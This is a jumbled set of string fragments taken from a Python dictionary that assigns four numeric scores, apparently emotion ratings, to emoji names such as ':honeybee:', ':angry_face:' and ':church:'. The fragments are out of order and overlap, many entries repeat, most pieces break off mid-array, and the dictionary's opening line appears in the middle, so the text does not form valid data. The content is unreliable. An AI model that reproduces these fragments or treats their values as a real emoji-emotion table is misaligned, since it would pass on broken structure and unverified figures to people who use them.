0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381,", "0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\":", "0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042, 0.128, 0.102, 0.077],", "0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122],", "0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\":", "[0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113,", "0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218],", "0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187,", "[0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002,", "0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332],", "\":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201,", "0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\":", "[0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996,", "\":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999,", "[0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999,", "\":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17,", "0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998],", "0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37,", "0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\":", "[0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212,", "0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\":", "0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\":", "[0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998,", "\":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168,", "0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\":", "[0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233,", "0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997],", "0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002],", "[0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111,", "[0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133,", "[0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141,", "0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262],", "0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188],", "0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165,", "0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24,", "0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264,", "0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997,", "0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003],", "0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\":", "[0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001,", "0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142,", "0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182,", "0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293],", "0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\":", "\":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217,", "0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\":", "0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171,", "\":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201,", "0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\":", "0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179,", "\":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379,", "\":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196,", "0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391],", "\":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161,", "0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997,", "\":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002,", "0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196], \":keycap_10:\":", "0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997],", "0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212],", "0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\":", "0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193], \":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184,", "0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331],", "0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002],", "[0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228,", "\":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1,", "0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318,", "0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\":", "0.21, 0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\":", "0.136, 0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131],", "0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299,", "0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\":", "0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999],", "[0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312,", "0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102],", "0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171, 0.16, 0.125],", "0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\":", "\":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242,", "\":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002,", "0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25],", "[0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46,", "[0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201,", "0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001,", "0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125,", "0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254,", "\":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207,", "\":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324,", "[0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182,", "0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316],", "0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\":", "0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\":", "0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002,", "[0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079,", "\":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25,", "[0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223,", "[0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078,", "0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287,", "[0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359,", "\":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002,", "[0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41,", "\":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995,", "[0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999,", "0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24],", "0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243,", "0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\":", "0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001,", "\":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999,", "0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092],", "0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002,", "[0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239,", "emoji_emotions = { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212],", "\":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998,", "0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256,", "[0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039,", "0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\":", "\":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179,", "[0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298,", "0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207,", "0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213],", "0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193],", "[0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999,", "[0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003,", "\":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271,", "0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\":", "[0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191,", "\":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228,", "0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13],", "0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002],", "[0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096,", "0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998],", "0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226],", "0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\":", "0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172,", "[0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003,", "[0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095,", "0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289],", "0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184,", "0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002],", "0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\":", "0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248],", "0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], \":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\":", "0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\":", "0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126],", "\":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996,", "0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\":", "0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\":", "0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002,", "0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\":", "0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371],", "0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175],", "0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\":", "[0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002,", "0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998,", "0.276, 0.172, 0.235], \":church:\": [0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214],", "0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106,", "0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242],", "\":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001,", "0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276],", "0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115,", "0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\":", "[0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25,", "0.231], 